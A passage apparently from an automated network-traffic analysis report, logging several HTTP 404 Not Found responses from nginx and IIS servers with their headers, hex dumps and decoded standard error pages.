3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:08:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:26 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:08:21 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:27 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:08:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:08:30 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:08:25 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 